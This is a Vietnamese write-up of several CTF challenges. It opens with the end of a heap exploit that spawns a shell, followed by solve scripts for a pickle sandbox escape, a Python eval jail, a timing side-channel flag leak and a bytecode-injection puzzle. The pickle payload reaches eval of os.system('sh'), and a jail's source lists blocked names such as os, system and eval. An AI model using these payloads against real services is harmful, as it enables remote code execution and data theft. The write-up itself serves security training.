print('libc: ', hex(libc.address))
add(0x10, 0, hex(libc.symbols['system']).encode())
add(0x10, 1, b'/bin/sh\x00')
p.sendlineafter(b'entry', b'42')


p.interactive()

MISC
Were Pickle Phreaks
credit: MacHongNam
Analysis
Source code:
app.py:
# python 3.8
from sandbox import unpickle, pickle
import random

members = []

class Phreaks:
    def __init__(self, hacker_handle, category, id):
        self.hacker_handle = hacker_handle
        self.category = category
        self.id = id

    def display_info(self):
        print('================ ==============')
        print(f'Hacker Handle    {self.hacker_handle}')
        print('================ ==============')
        print(f'Category         {self.category}')
        print(f'Id               {self.id}')
        print()

def menu():
    print('Phreaks member registration v2')
    print('1. View current members')
    print('2. Register new member')
    print('3. Exit')

def add_existing_members():
    members.append(pickle(Phreaks('Skrill', 'Rev', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Alfredy', 'Hardware', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Suspicious', 'Pwn', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Queso', 'Web', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Stackos', 'Blockchain', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Lin', 'Web', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Almost Blood', 'JIT', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Fiasco', 'Web', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Big Mac', 'Web', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Freda', 'Forensics', random.randint(1, 10000))))
    members.append(pickle(Phreaks('Karamuse', 'ML', random.randint(1, 10000))))

def view_members():
    for member in members:
        try:
            member = unpickle(member)
            member.display_info()
        except Exception as e:
            print('Invalid Phreaks member', e)

def register_member():
    pickle_data = input('Enter new member data: ')
    members.append(pickle_data)

def main():
    add_existing_members()
    while True:
        menu()
        try:
            option = int(input('> '))
        except ValueError:
            print('Invalid input')
            print()
            continue
        if option == 1:
            view_members()
        elif option == 2:
            register_member()
        elif option == 3:
            print('Exiting...')
            exit()
        else:
            print('No such option')
        print()

if __name__ == '__main__':
    main()

Đây là một chương trình với 2 chức năng cơ bản:

view_members(): thực hiện deserialize và hiển thị các đối tượng

register_member(): nhận input là dạng base64 của 1 đối tượng sau khi đã serialize


sandbox.py:
from base64 import b64decode, b64encode 
from io import BytesIO
import pickle as _pickle

ALLOWED_PICKLE_MODULES = ['__main__', 'app']
UNSAFE_NAMES = ['__builtins__']

class RestrictedUnpickler(_pickle.Unpickler):
    def find_class(self, module, name):
        print(module, name)
        if (module in ALLOWED_PICKLE_MODULES and not any(name.startswith(f"{name_}.") for name_ in UNSAFE_NAMES)):
            return super().find_class(module, name)
        raise _pickle.UnpicklingError()

def unpickle(data):
    return RestrictedUnpickler(BytesIO(b64decode(data))).load()

def pickle(obj):
    return b64encode(_pickle.dumps(obj))


Ở đây, class RestrictedUnpickler kế thừa từ _pickle.Unpickler, định nghĩa phương thức findclass() thực hiện detect các module và name được cho phép. Trong pickle, phương thức find_class() có source code như sau:

def find_class(self, module, name):
    # Subclasses may override this.
    sys.audit('pickle.find_class', module, name)
    if self.proto < 3 and self.fix_imports:
        if (module, name) in _compat_pickle.NAME_MAPPING:
            module, name = _compat_pickle.NAME_MAPPING[(module, name)]
        elif module in _compat_pickle.IMPORT_MAPPING:
            module = _compat_pickle.IMPORT_MAPPING[module]
    __import__(module, level=0)
    if self.proto >= 4:
        return _getattribute(sys.modules[module], name)[0]
    else:
        return getattr(sys.modules[module], name)

Nó được dùng để tìm và nhập các module được chỉ định trong dữ liệu đã được pickled. RestrictedUnpickler hook vào phương thức find_class() để thực hiện sàng lọc các module. Ở đây các module được cho phép là __main__, app và name bị cấm là __builtins__
Solution
Trong python, các module liên kết với nhau, do đó từ __main__, app chúng ta có thể nhập các module khác. Sử dụng dir() để check xem __main__ có những module nào:

Chú ý một chút thì đoạn code filter khá lỏng lẻo:
if (module in ALLOWED_PICKLE_MODULES and not any(name.startswith(f"{name_}.") for name_ in UNSAFE_NAMES)):

Nó chỉ check xem name có bắt đầu bằng __builtins__. hay không, do đó mình có thể bypass bằng __setattr__ để đổi name của __builtins__ thành một ký tự khác. Mình sử dụng Pickora để compile python pickle scripts, Pickle sử dụng GLOBAL để nhập module.
Solve script:
from pickora import Compiler
from base64 import b64encode

def main():
    return 1

if __name__ == '__main__':
    compiler = Compiler()
    payload = b"setattr = GLOBAL('__main__', '__setattr__');"
    payload += b"builtins = GLOBAL('__main__','__builtins__');"
    payload += b"setattr('e',builtins);"
    payload += b"GLOBAL('__main__','e.eval')(\"__import__('os').system('sh')\")"
    print(b64encode(compiler.compile(payload)).decode())

Giải thích một chút, GLOBAL('__main__', '__setattr__') lấy function __main__.__setattr__ và gán vào biến setattr, tương tự là builtins. setattr('e',builtins) thực hiện set function __main__.__builtins__ thành e và cuối cùng là gọi e.eval để thực thi code python __import__('os').system('sh').


Were Pickle Phreaks Revenge
credit: MacHongNam
Source code không thay đổi, thay đổi duy nhất đến từ sandbox.py:
ALLOWED_PICKLE_MODULES = ['__main__', 'app']
UNSAFE_NAMES = ['__builtins__', 'random']

Có lẽ hướng intended của challege Were Pickle Phreaks là sử dụng module random để thực hiện call các module khác:

Ở đây có thể sử dụng module _os để gọi hàm system():

Cách của mình không sử dụng đến module random nên có thể bypass luôn challenge này:

Character
credit: MinhFanBoy
TASK
Mình kết nối đến sever thì được yêu cầu nhập một số và số ta sẽ nhận lại được flag tại vị trí đó. Nên mình viết một script đơn giản để gửi tất cả các số tới khi nhận được ký tự "}".
from pwn import *

def main() -> None:
    i = 0
    s = remote("83.136.252.194", 57105)

    while True:
        s.recvuntil(b"Enter an index: ")

        s.sendline(f"{i}".encode())

        s.recvuntil(f"at Index {i}: ".encode())
        print(s.recvline()[:-1].decode(), end="", flush=True)
        i += 1

if __name__ == "__main__":
    main()

Unbreakable
credit: MinhFanBoy
SOURCE:
#!/usr/bin/python3

banner1 = '''
                   __ooooooooo__
              oOOOOOOOOOOOOOOOOOOOOOo
          oOOOOOOOOOOOOOOOOOOOOOOOOOOOOOo
       oOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOo
     oOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOo
   oOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOo
  oOOOOOOOOOOO*  *OOOOOOOOOOOOOO*  *OOOOOOOOOOOOo
 oOOOOOOOOOOO      OOOOOOOOOOOO      OOOOOOOOOOOOo
 oOOOOOOOOOOOOo  oOOOOOOOOOOOOOOo  oOOOOOOOOOOOOOo
oOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOo
oOOOO     OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO     OOOOo
oOOOOOO OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO OOOOOOo
 *OOOOO  OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO  OOOOO*
 *OOOOOO  *OOOOOOOOOOOOOOOOOOOOOOOOOOOOO*  OOOOOO*
  *OOOOOO  *OOOOOOOOOOOOOOOOOOOOOOOOOOO*  OOOOOO*
   *OOOOOOo  *OOOOOOOOOOOOOOOOOOOOOOO*  oOOOOOO*
     *OOOOOOOo  *OOOOOOOOOOOOOOOOO*  oOOOOOOO*
       *OOOOOOOOo  *OOOOOOOOOOO*  oOOOOOOOO*      
          *OOOOOOOOo           oOOOOOOOO*      
              *OOOOOOOOOOOOOOOOOOOOO*          
                   ""ooooooooo""
'''

banner2 = '''
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⡟⠁⠀⠉⢿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡿⠀⠀⠀⠀⠀⠻⣧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⢀⠀⠀⠀⠀⢻⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⣼⣰⢷⡤⠀⠈⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣇⠀⠉⣿⠈⢻⡀⠀⢸⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠀⠀⢹⡀⠀⢷⡀⠘⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⣧⠀⠘⣧⠀⢸⡇⠀⢻⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣤⣤⠶⠾⠿⢷⣦⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⡆⠀⠘⣦⠀⣇⠀⠘⣿⣤⣶⡶⠶⠛⠛⠛⠛⠶⠶⣤⣾⠋⠀⠀⠀⠀⠀⠈⢻⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣄⠀⠘⣦⣿⠀⠀⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⡟⠀⠀⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣦⠀⠛⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⠁⠀⠀⠀⠀⠀⠀⠀⢸⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠀⠀⠀⠀⠀⠀⢠⣿⠏⠁⠀⢀⡴⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡏⠀⠀⠀⠀⠀⠀⠀⢰⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⢠⠶⠛⠉⢀⣄⠀⠀⠀⢀⣿⠃⠀⠀⡴⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢷⠀⠀⠀⠀⠀⠀⣴⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⣀⣠⡶⠟⠋⠁⠀⠀⠀⣼⡇⠀⢠⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢷⣄⣀⣀⣠⠿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠋⠁⠀⠀⠀⠀⣀⣤⣤⣿⠀⠀⣸⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠀⠀⢻⡇⠀⠀⠀⠀⢠⣄⠀⢶⣄⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⠿⠟⠛⠋⠹⢿⠀⠀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⡀⠀⠀⠀⠀⠘⢷⡄⠙⣧⡀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣴⠟⠋⠁⠀⠀⠀⠀⠘⢸⡀⠀⠿⠀⠀⠀⣠⣤⣤⣄⣄⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣀⡀⠀⠀⠀⢸⡟⠻⣿⣦⡀⠀⠀⠀⠙⢾⠋⠁⠀⠀⠀⠀⠀
⠀⠀⠀⠀⣠⣾⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠈⣇⠀⠀⠀⠀⣴⡏⠁⠀⠀⠹⣷⠀⠀⠀⠀⣠⡿⠋⠀⠀⠈⣷⠀⠀⠀⣾⠃⠀⠀⠉⠻⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⣴⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⡆⠀⠀⠀⠘⢷⣄⡀⣀⣠⣿⠀⠀⠀⠀⠻⣧⣄⣀⣠⣴⠿⠁⠀⢠⡟⠀⠀⠀⠀⠀⠙⢿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣾⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡽⣦⡀⣀⠀⠀⠉⠉⠉⠉⠀⢀⣀⣀⡀⠀⠉⠉⠉⠁⠀⠀⠀⣠⡿⠀⠀⠀⠀⠀⠀⠀⠈⢻⣧⡀⠀⠀⠀⠀⠀⠀⠀
⠀⢰⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠃⠈⢿⣿⣧⣄⠀⠀⠰⣦⣀⣭⡿⣟⣍⣀⣿⠆⠀⠀⡀⣠⣼⣿⠁⠀⠀⠀⠀⠀⠀⠀⢀⣤⣽⣷⣤⣤⠀⠀⠀⠀⠀
⠀⢀⣿⡆⠀⠀⠀⢀⣀⠀⠀⠀⠀⠀⠀⢀⣴⠖⠋⠁⠈⠻⣿⣿⣿⣶⣶⣤⡉⠉⠀⠈⠉⢉⣀⣤⣶⣶⣿⣿⣿⠃⠀⠀⠀⠀⢀⡴⠋⠀⠀⠀⠀⠀⠉⠻⣷⣄⠀⠀⠀
⠀⣼⡏⣿⠀⢀⣤⠽⠖⠒⠒⠲⣤⣤⡾⠋⠀⠀⠀⠀⠀⠈⠈⠙⢿⣿⣿⣿⣿⣿⣾⣷⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⠀⣀⣤⠶⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢻⣧⠀⠀
⢰⣿⠁⢹⠀⠈⠀⠀⠀⠀⠀⠀⠀⣿⠷⠦⠄⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠉⢀⣠⠶⠋⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣧⠀
⣸⡇⠀⠀⠀⠀⠀⠀⠀⢰⡇⠀⠀⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠀⠉⠉⠛⠋⠉⠙⢧⠀⠀⢸⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡆
⣿⡇⠀⠀⠈⠆⠀⠀⣠⠟⠀⠀⠀⢸⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⢿⠀⠀⠀⠀⠀⠀⠀⠈⠱⣄⣸⡇⠠⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣻⡇
⢻⣧⠀⠀⠀⠀⠀⣸⣥⣄⡀⠀⠀⣾⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⠂⠀⠀⠀⠀⠀⠀⣿⡇
⢸⣿⣦⠀⠀⠀⠚⠉⠀⠈⠉⠻⣾⣿⡏⢻⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣟⢘⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠟⢳⡄⠀⠀⠀⠀⠀⠀⠀⠀⠐⡟⠀⠀⠀⠀⠀⠀⢀⣿⠁
⢸⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠻⣇⠈⠻⠷⠦⠤⣄⣀⣀⣀⣀⣠⣿⣿⣄⠀⠀⠀⠀⠀⣠⡾⠋⠄⠀⠈⢳⡀⠀⠀⠀⠀⠀⠀⠀⣸⠃⠀⠀⠀⠀⠀⠀⣸⠟⠀
⢸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣧⣔⠢⠤⠤⠀⠀⠈⠉⠉⠉⢤⠀⠙⠓⠦⠤⣤⣼⠋⠀⠀⠀⠀⠀⠀⠹⣦⠀⠀⠀⠀⠀⢰⠏⠀⠀⠀⠀⠀⢀⣼⡟⠀⠀
⠀⢻⣷⣖⠦⠄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣷⠈⢳⡀⠈⠛⢦⣀⡀⠀⠀⠘⢷⠀⠀⠀⢀⣼⠃⠀⠀⠀⠀⠀⠀⠀⠀⠈⠳⡄⠀⠀⣠⠏⠀⠀⠀⠀⣀⣴⡿⠋⠀⠀⠀
⠀⠀⠙⠻⣦⡀⠈⠛⠆⠀⠀⠀⣠⣤⡤⠀⠿⣤⣀⡙⠢⠀⠀⠈⠙⠃⣠⣤⠾⠓⠛⠛⢿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⡴⠞⠁⢀⣠⣤⠖⢛⣿⠉⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠈⠙⢷⣤⡁⠀⣴⠞⠁⠀⠀⠀⠀⠈⠙⠿⣷⣄⣀⣠⠶⠞⠋⠀⠀⠀⠀⠀⠀⢻⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⠶⠞⠋⠁⠀⢀⣾⠟⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠉⠻⣷⡷⠀⠀⠀⠀⠀⠀⠀⠀⠀⢙⣧⡉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠢⣤⣀⣀⠀⠀⠈⠂⢀⣤⠾⠋⠀⠀⠀⠀⠀⣠⡾⠃⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⢀⣠⠎⣠⡾⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣧⠀⣦⠀⠀⠀⠀⠀⠀⠀⣿⣇⢠⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠤⢐⣯⣶⡾⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢿⣄⠸⣆⠀⠀⠲⣆⠀⠀⢸⣿⣶⣮⣉⡙⠓⠒⠒⠒⠒⠒⠈⠉⠁⠀⠀⠀⠀⠀⢀⣶⣶⡿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠷⠾⠷⣦⣾⠟⠻⠟⠛⠁⠀⠈⠛⠛⢿⣶⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⠀⣨⣾⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠙⠛⠛⠛⠻⠿⠿⠿⠿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
'''

blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%', 
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's', 
              'lower', 'upper', 'system', '}', '{' ]

while True:
  ans = input('Break me, shake me!\n\n$ ').strip()

  if any(char in ans for char in blacklist):
    print(f'\n{banner1}\nNaughty naughty..\n')
  else:
    try:
      eval(ans + '()')
      print('WHAT WAS THAT?!\n')
    except:
      print(f"\n{banner2}\nI'm UNBREAKABLE!\n")

Hàm eval() là hàm sẽ thực thi những câu lệnh python mà ta viết trong đó dưới dạng str. Nhưng những str ta nhập phải vượt qua black list chặn rất nhiều những ký tự và hàm quan trọng. Ta đã biết rằng flag được chứa trong file "flag.txt" nên bây giờ ta cần gửi một đoạn code có thể mở file đó và in ra cho chúng ta flag mà hàm open() và print() đều thỏa mãn backlist nên dùng nó gửi đi là có được flag.
# nc 

from pwn import *

def main() -> None:

    s = remote("83.136.252.194", 45881)

    print(s.recvuntil(b"\n\n").decode())
    s.sendline(b"print(open('flag.txt','r').read())#")
    print(s.recvuntil(b'}').decode())

if __name__ == "__main__":
    main()

Stop Drop and Roll
credit: MinhFanBoy
SOURCE:
import random

CHOICES = ["GORGE", "PHREAK", "FIRE"]

print("===== THE FRAY: THE VIDEO GAME =====")
print("Welcome!")
print("This video game is very simple")
print("You are a competitor in The Fray, running the GAUNTLET")
print("I will give you one of three scenarios: GORGE, PHREAK or FIRE")
print("You have to tell me if I need to STOP, DROP or ROLL")
print("If I tell you there's a GORGE, you send back STOP")
print("If I tell you there's a PHREAK, you send back DROP")
print("If I tell you there's a FIRE, you send back ROLL")
print("Sometimes, I will send back more than one! Like this: ")
print("GORGE, FIRE, PHREAK")
print("In this case, you need to send back STOP-ROLL-DROP!")

ready = input("Are you ready? (y/n) ")

if ready.lower() != "y":
    print("That's a shame!")
    exit(0)

print("Ok then! Let's go!")

count = 0
tasks = []

for _ in range(500):
    tasks = []
    count = random.randint(1, 5)

    for _ in range(count):
        tasks.append(random.choice(CHOICES))

    print(', '.join(tasks))

    result = input("What do you do? ")
    correct_result = "-".join(tasks).replace("GORGE", "STOP").replace("PHREAK", "DROP").replace("FIRE", "ROLL")

    if result != correct_result:
        print("Unfortunate! You died!")
        exit(0)

print(f"Fantastic work! The flag is {FLAG}")

Bài này cũng không có gì ta chỉ cần nhận vào một list rồi gửi lại một list khác với các giá trị tương ứng là được. Đề bài cho ta một chuỗi các sữ kiện như GORGE, PHREAK và FIRE và ta cần phải gửi lại sao cho thỏa mãn
print("If I tell you there's a GORGE, you send back STOP")
print("If I tell you there's a PHREAK, you send back DROP")
print("If I tell you there's a FIRE, you send back ROLL")

nên mình viết một đoạn code đơn giản thay thế các ký tự bằng ký tự thay thế là xong.
# nc 83.136.251.232 58416

from pwn import *

def main() -> None:

    s = remote("83.136.251.232", 58416)

    s.sendlineafter(b'(y/n) ', b'y')
    s.recvline()

    while True:
        recv = s.recvlineS().strip()
        print(recv)

        result = recv.replace(", ", "-")
        result = result.replace("GORGE", "STOP")
        result = result.replace("PHREAK", "DROP")
        result = result.replace("FIRE", "ROLL")

        s.sendlineafter(b'do? ', result.encode())


if __name__ == "__main__":
    main()

Cubicle Riddle
credit: MinhFanBoy
SOURCE:
here :v

Bài này có mấu chốt chủ yếu là ở phần này:

    def _construct_answer(self, answer: bytes) -> types.CodeType:
        co_code: bytearray = bytearray(self.co_code_start)
        co_code.extend(answer)
        co_code.extend(self.co_code_end)
        code_obj: types.CodeType = types.CodeType(
            1,
            0,
            0,
            4,
            3,
            3,
            bytes(co_code),
            (None, self.max_int, self.min_int),
            (),
            ("num_list", "min", "max", "num"),
            __file__,
            "_answer_func",
            "_answer_func",
            1,
            b"",
            b"",
            (),
            (),
        )

Mình có thể gửi một đoạn bytes vào phần co_de. Chúng ta cần chú ý đến một vài phần sau:

codeobject.co_consts là mảng tuple chứa các giá trị của hàm, ở trong trường hợp này là (None, self.max_int, self.min_int)

codeobject.co_varnames là mảng gồm tên của các biến trong hàm, ở trong trường hợp này là ("num_list", "min", "max", "num")

codeobject.co_code đây là phần quan trong nhất, là một chuỗi byte biểu thị chuỗi hướng dẫn mã byte trong hàm.


Từ đó chúng ta có thể gán giá trị của một số nào đó cho min, max rồi có thể trả nó về. Trong python có hỗ trợ thư viện này giúp chuyển hàm thành dạng code.
Tổng hợp tất cả các thông tin đã có như sau: ta viết một hàm tìm ra giá trị lớn nhất, nhỏ nhất của nums_list rồi lưu lại vào biến min, max đã có sẵn, sau đó chuyển nó thành dạng bytes và gửi nó đi là ta thành công có được flag.
from pwn import *
def _answer_func(num_list: int):
    min: int = 1000
    max: int = -1000
    for num in num_list:
        if num < min:
            min = num
        if num > max:
            max = num
    return (min, max)

def main() -> None:
    s = remote("94.237.54.30", 56070)
    ans: bytes = _answer_func.__code__.co_code
    ans = ",".join([str(x) for x in ans])
    print(ans)

    print(s.recvuntil(b"(Choose wisely) > ").decode())
    s.sendline(b"1")
    print(s.recvuntil(b"(Answer wisely) >").decode())
    s.sendline(ans.encode())
    print(s.recvuntil(b"}").decode())
if __name__ == "__main__":
    main()

MultiDigilingual
credit: MinhFanBoy
TASK:
****************************************
*   How many languages can you talk?   *
*        Pass a program that's         *
*   all of the below that just reads   *
*      the file `flag.txt` to win      *
*          and pass the test.          *
*                                      *
*              Languages:              *
*               * Python3              *
*               * Perl                 *
*               * Ruby                 *
*               * PHP8                 *
*               * C                    *
*               * C++                  *
*                                      *
*   Succeed in this and you will be    *
*               rewarded!              *
****************************************

Enter the program of many languages (input in base64):

Bài này khá là hay. Có thể giải theo cách timming attack. Đề bài yêu cầu ta phải nhập vào một program có thể chạy được nhiều ngôn ngữ để đọc file, máy chủ sẽ chạy file đó qua từng ngôn ngữ khác nhau cho tới khi thỏa mãn hết sẽ in ra flag. Nhưng việc code như vậy sẽ khá tốn công nên lợi dụng việc chương trình chạy code mà ta gửi để có thể lợi dựng điều đó để chạy một vài hàm leak ra thông tin gì đó về flag (ở đây nó leak ra dưới dạng thời gian phản hồi).
Khi ta gửi chương trình này:
import time
flag = open('flag.txt', 'r').read()
time.sleep(ord(flag[{i}]) / 10)

Máy chủ sẽ chạy nó, trong khi nó vẫn thỏa mãn yêu cầu của sever và cũng leak cho chúng ta thông tin thêm về flag.
Từ đó, ta gửi yêu cầu nhiều lần lên lên máy chủ, mỗi lần đọc từng ký tự của flag khi đó chương trình sẽ tạm dừng chương trình một khoảng thời gian đúng bằng (ord(flag) / 10) nên ta tính toán khoảng thời gian chênh lệch là ta có flag (trong đoạn code có bị trừ đi cho 2 là do một vài yếu tố mội trường như tốc độ mang, máy tính ảnh hưởng tới thời gian)

import time
from base64 import *
from pwn import *

def main() -> None:

    flag = ""

    for i in range(100):

        code = f"""
import time
flag = open('flag.txt', 'r').read()
time.sleep(ord(flag[{i}]) / 10)
"""
        s = remote("94.237.63.93", 38070)

        s.recvuntil(b'Enter the program of many languages: ')
        start = time.time()
        s.sendline(b64encode(code.encode()))
        s.recvuntil(b'[+] Completed. Checking output')
        end = time.time()

        flag += chr(int((end - start)* 10) - 2)
        print(flag)

        s.close()

        if flag[-1] == "}":
            break

if __name__ == "__main__":
    main()

Một cách khá cũng khá hay mình tham khảo trên mạng. Mình viết một file thỏa mãn tất cả các ngôn ngữ ở trên.
#include/*
#
q="""*/
